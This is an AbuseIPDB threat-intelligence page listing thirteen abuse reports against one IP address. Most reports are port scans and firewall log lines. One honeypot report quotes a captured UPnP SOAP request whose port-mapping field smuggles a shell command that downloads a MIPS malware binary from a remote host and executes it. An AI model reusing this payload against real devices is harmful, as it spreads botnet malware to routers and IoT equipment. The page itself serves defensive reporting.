JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 216.167.21.34

216.167.21.34 was found in our database!

This IP was reported 13 times. Confidence of Abuse is 79%: ?

79%

ISP	NTT America, Inc.
Usage Type	Fixed Line ISP
ASN	AS2914
Domain Name	ntt.com
Country	🇺🇸 United States of America
City	Los Angeles, California

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 216.167.21.34

Whois 216.167.21.34

IP Abuse Reports for 216.167.21.34:

This IP address has been reported a total of 13 times from 13 distinct sources. 216.167.21.34 was first reported on June 18th 2026, and the most recent report was 2 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇹 urnilxfgbez	2026-06-19 22:45:00 (2 hours ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
Anonymous	2026-06-19 22:39:49 (2 hours ago)	Jun 19 05:11:46 localhost kernel: [110205590.071042] iptables_INPUT_denied: IN=eth0 OUT= MAC=f2:3c:9 ... show more Jun 19 05:11:46 localhost kernel: [110205590.071042] iptables_INPUT_denied: IN=eth0 OUT= MAC=f2:3c:91:84:83:95:00:00:0c:9f:f0:1e:08:00 SRC=216.167.21.34 DST=[mungedIP2] LEN=40 TOS=0x00 PREC=0x40 TTL=50 ID=36095 PROTO=TCP SPT=58677 DPT=52869 WINDOW=25686 RES=0x00 SYN URGP=0 Jun 19 05:11:46 localhost kernel: [110205590.071062] iptables_INPUT_denied: IN=eth0 OUT= MAC=f2:3c:91:84:83:95:00:00:0c:9f:f0:1e:08:00 SRC=216.167.21.34 DST=[mungedIP2] LEN=40 TOS=0x00 PREC=0x40 TTL=50 ID=36095 PROTO=TCP SPT=58677 DPT=52869 SEQ=758669438 ACK=0 WINDOW=25686 RES=0x00 SYN URGP=0 Jun 19 18:39:49 localhost kernel: [110254071.289746] iptables_INPUT_denied: IN=eth0 OUT= MAC=f2:3c:91:84:83:95:00:00:0c:9f:f0:1e:08:00 SRC=216.167.21.34 DST=[mungedIP2] LEN=40 TOS=0x00 PREC=0x40 TTL=50 ID=52893 PROTO=TCP SPT=61237 DPT=52869 WINDOW=13318 RES=0x00 SYN URGP=0 Jun 19 18:39:49 localhost kernel: [110254071.289764] iptables_INPUT_denied: IN=eth0 OUT= MAC=f2:3c:91:84:83:95:00:00:0c:9f:f0:1e:08:00 SRC=216.167.21.34 DST=[mungedIP2] LEN=40 TOS show less	Port Scan
🇩🇪 ValtonTahiri	2026-06-19 09:37:34 (15 hours ago)	UFW blocked a suspicious connection attempt to a closed or denied port. This activity is commonly as ... show more UFW blocked a suspicious connection attempt to a closed or denied port. This activity is commonly associated with port scanning, service discovery, or automated internet probing. Technical: source_ip=216.167.21.34; proto=TCP; source_port=58933; target_port=8080; flags=SYN show less	Port Scan
🇬🇧 OptimusGO	2026-06-19 09:08:03 (15 hours ago)	Malicious activity detected: web_attack Server: commstackbc (185.127.18.66) Attack: web_attack Time ... show more Malicious activity detected: web_attack Server: commstackbc (185.127.18.66) Attack: web_attack Timestamp: 2026-06-19 10:08:03 UTC Log evidence: 06/19/2026-10:08:02.365860 [] [1:1000103:1] SECURITY Management Port Probe - CRITICAL [] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 216.167.21.34:60981 -> 185.127.18.66:8080 show less	Port Scan Brute-Force
🇺🇸 MPL	2026-06-19 08:30:38 (16 hours ago)	tcp/80	Port Scan
🇩🇪 centurion	2026-06-19 01:55:49 (23 hours ago)	Blocked by UFW on ns02 [52869/tcp] Source port: 61237 TTL: 47 Packet length: 40 TOS: 0x00 This repo ... show more Blocked by UFW on ns02 [52869/tcp] Source port: 61237 TTL: 47 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇫🇷 EDSL	2026-06-19 01:31:04 (23 hours ago)	[SRV-VPN1] Blocked by SysWarden Firewall (Port Scan / Probing)	Port Scan
🇹🇷 Threat.live	2026-06-18 23:25:03 (1 day ago)	Threat.live: Web Scan	Web App Attack
Anonymous	2026-06-18 21:41:00 (1 day ago)	5555	Port Scan Hacking
🇩🇪 Lazentis	2026-06-18 19:27:08 (1 day ago)	Unauthorized access attempt to port 8080 (tcp)	Brute-Force SSH
🇬🇧 gbzret4d	2026-06-18 18:27:50 (1 day ago)	Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (co ... show more Honeypot [uk-production01]: HTTP/1.1 request on 52869 POST /picdesc.xml User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: / Accept-Encoding: gzip, deflate POST Data: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>; 52869 [2] TCP show less	Hacking Bad Web Bot
🇳🇱 VMHeaven.io	2026-06-18 17:44:34 (1 day ago)	Blocked by UFW [37215/tcp] Source port: 60213 TTL: 50 Packet length: 40	Port Scan
🇭🇺 bcsaba	2026-06-18 12:52:26 (1 day ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack

Showing 1 to 13 of 13 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇵🇰 223.123.125.10

🇺🇸 216.73.216.90

🇩🇪 213.209.159.231

🇮🇳 206.183.111.36

🇧🇪 198.235.24.212

🇪🇸 196.196.150.6

🇬🇧 192.248.150.180

🇸🇬 185.200.116.42

🇺🇸 172.110.223.179

🇳🇱 161.35.146.48

🇭🇰 150.5.131.119

🇨🇦 143.110.217.147

🇮🇳 135.235.138.43

🇩🇪 128.1.123.235

🇹🇼 111.70.49.185

🇧🇩 103.171.69.84

🇻🇳 103.28.36.198

🇱🇹 91.224.92.17

🇳🇱 91.92.40.153

🇨🇳 58.254.16.239